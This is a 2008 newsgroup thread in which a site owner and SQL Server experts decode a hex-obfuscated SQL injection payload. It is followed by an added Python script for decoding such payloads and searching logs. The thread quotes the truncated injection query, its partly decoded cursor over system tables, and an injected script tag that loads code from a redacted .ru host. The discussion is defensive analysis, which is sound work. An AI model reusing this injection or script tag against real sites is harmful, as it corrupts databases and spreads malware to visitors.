sql injection gibberish


shank

Jul 14, 2008, 8:49:54 AM
I'm finally winning against the script injection attacks.

How can I convert the below gibberish into code I can understand?
I'd like to know what they are throwin' at me.

title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

thanks


SQL Menace

Jul 14, 2008, 10:07:43 AM
Take a look here
http://sqlblog.com/blogs/denis_gobo/archive/2008/06/25/7491.aspx


Denis The SQL Menace
http://www.lessthandot.com/
http://sqlservercode.blogspot.com
http://sqlblog.com/blogs/denis_gobo/default.aspx


On Jul 14, 8:49 am, "shank" <sh...@tampabay.rr.com> wrote:
> I'm finally winning against the script injection attacks.
>
> How can I convert the below gibberish into code I can understand?
> I'd like to know what they are throwin' at me.
>

> title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C40432056415

Plamen Ratchev

Jul 14, 2008, 10:24:04 AM
Take a look at the following article, it explains in detail this type of
SQL injection attack:
http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx

HTH,

Plamen Ratchev
http://www.SQLStudio.com

Mike C#

Jul 14, 2008, 2:44:42 PM
FWIW here's a translation of what you posted:

DECLARE @S VARCHAR(4000);SET @S='DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects
a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35
OR ...

Hackers + Dynamic SQL + Cursors ==> Wow. The best of all possible worlds.

--

========
Michael Coles
"Pro SQL Server 2008 XML"
http://www.amazon.com/Pro-SQL-Server-2008-XML/dp/1590599837/


Eric Isaacs

Jul 14, 2008, 3:10:56 PM
You could try...

PRINT CAST(0x4445434C415245204054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...
AS VARCHAR(8000))

...to see what it converts to in VARCHAR.

-Eric Isaacs

shank

Jul 14, 2008, 5:33:11 PM
OK... much appreciated... but how did you translate?
thanks


Michael Coles

Jul 15, 2008, 1:15:45 AM
"shank" <sh...@tampabay.rr.com> wrote in message
news:uGta9kf5...@TK2MSFTNGP05.phx.gbl...

> OK... much appreciated... but how did you translate?
> thanks

I just did a SELECT CAST(<insert binary string here> AS VARCHAR(MAX)). You
were probably getting gibberish if you were trying to convert the exact
string you posted since it has an odd number of characters. Delete the 6
from the end and try again.

shank

Jul 17, 2008, 9:52:58 PM
I used your sample below to decode.

How can I encode the following: <script
src=http://www.xxxxx.ru/ngg.js></script>

So I can make it easier to find the entry in the logs? They're hittin' my
server through a dozen sites all day long. I've got them down to 95%
failures. But I still get that one that gets through and I need to find
which page is being assaulted. It would be easier if I could search for the
exact encoded characters.

thanks

Eric Isaacs

Jul 18, 2008, 2:11:59 PM
> How can I encode the following:

-- give VARBINARY an explicit length: in CAST it defaults to 30 bytes, which would cut this string short
SELECT CAST('<script src=http://www.xxxxx.ru/ngg.js></script>' AS VARBINARY(8000))

You could also convert/cast the binary to string and search that
result for it as well.

Make sure that the infected fields aren't truncated too. Some of
these SQL injection attacks truncated data when they appended the
scripts. So you may have lost data as well, and removing the scripts
won't fix everything. A DB backup may be the only way to fix some of
them.

-Eric Isaacs
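The two things worked out across this thread (decoding the 0x literal the way CAST(... AS VARCHAR) does, including the odd-digit problem Michael Coles points out, and encoding a known string so the hex form can be searched for in web logs, as Eric Isaacs suggests) can be done offline without a SQL Server at hand. The script below is an added example and is not code from anyone in the thread. The query string is the one from the first post re-joined onto one line; the log lines and the function names (decode_hex_literal, decode_request, encode_for_search, find_encoded_in_logs) are constructed for the example.

```python
import binascii
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Constructed sample: the query string from the first post, re-joined into
# one line (the newsgroup client wrapped it). It ends in a lone trailing "6".
SAMPLE_QUERY = (
    "title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    "4445434C415245204054205641524348415228323535292C40432056415"
    "2434841522832353529204445434C415245205461626C655F437572736F7220"
    "435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520"
    "46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057"
    "4845524520612E69643D622E696420414E4420612E78747970653D27752720414"
    "E442028622E78747970653D3939204F5220622E78747970653D3335204F52206"
)

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")


def decode_hex_literal(hex_digits: str) -> Tuple[str, str]:
    """Decode a T-SQL 0x... literal to text, as CAST(... AS VARCHAR) would.

    Returns (text, leftover_nibble). A truncated log line leaves an odd number
    of hex digits; CAST fails on that, so the dangling digit is set aside and
    reported instead of aborting the decode.
    """
    leftover = ""
    if len(hex_digits) % 2:
        hex_digits, leftover = hex_digits[:-1], hex_digits[-1]
    # latin-1 maps every byte to exactly one character, so decoding cannot fail.
    text = binascii.unhexlify(hex_digits).decode("latin-1")
    return text, leftover


def decode_request(query_string: str) -> List[Dict[str, object]]:
    """URL-decode a request and decode every 0x literal found in it."""
    plain = unquote(query_string)
    found = []
    for match in HEX_LITERAL.finditer(plain):
        text, leftover = decode_hex_literal(match.group(1))
        found.append({"hex_len": len(match.group(1)),
                      "text": text,
                      "leftover_nibble": leftover})
    return found


def encode_for_search(text: str) -> str:
    """Hex form a string takes inside a 0x literal (what CAST(... AS VARBINARY) shows)."""
    return binascii.hexlify(text.encode("latin-1")).decode("ascii").upper()


def find_encoded_in_logs(log_lines: List[str], needle_text: str) -> List[str]:
    """Return the log lines that carry needle_text in hex-literal form.

    The comparison is case-insensitive because the sender chooses the hex case.
    """
    needle = encode_for_search(needle_text)
    return [line for line in log_lines if needle in line.upper()]


# Constructed web-server log lines (not from the original thread): one clean
# request, and the same encoded script tag once in upper- and once in lower-case hex.
SAMPLE_LOGS = [
    "GET /default.asp?title=A&bt=1 200",
    "GET /news.asp?id=7;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    "3C736372697074207372633D687474703A2F2F7777772E78787878782E72752F"
    "6E67672E6A733E3C2F7363726970743E%20AS%20VARCHAR(4000)) 500",
    "GET /list.asp?cat=3;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    "3c736372697074207372633d687474703a2f2f7777772e78787878782e72752f"
    "6e67672e6a733e3c2f7363726970743e%20AS%20VARCHAR(4000)) 500",
]

if __name__ == "__main__":
    for item in decode_request(SAMPLE_QUERY):
        print(item["text"])
        if item["leftover_nibble"]:
            print("dangling hex digit dropped:", item["leftover_nibble"])
    hits = find_encoded_in_logs(SAMPLE_LOGS, "<script src=http://www.xxxxx.ru/ngg.js></script>")
    print(len(hits), "log lines carry the encoded script tag")
```

Run as-is it prints the same DECLARE @T ... cursor text Mike C# posted, plus the dangling "6" that made the odd-length string fail in CAST. Searching logs for a short distinctive piece such as "ngg.js" rather than the whole tag catches the same lines and survives small variations in the rest of the payload; the case-insensitive match matters because the hex digits A-F can be sent in either case and SQL Server accepts both.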
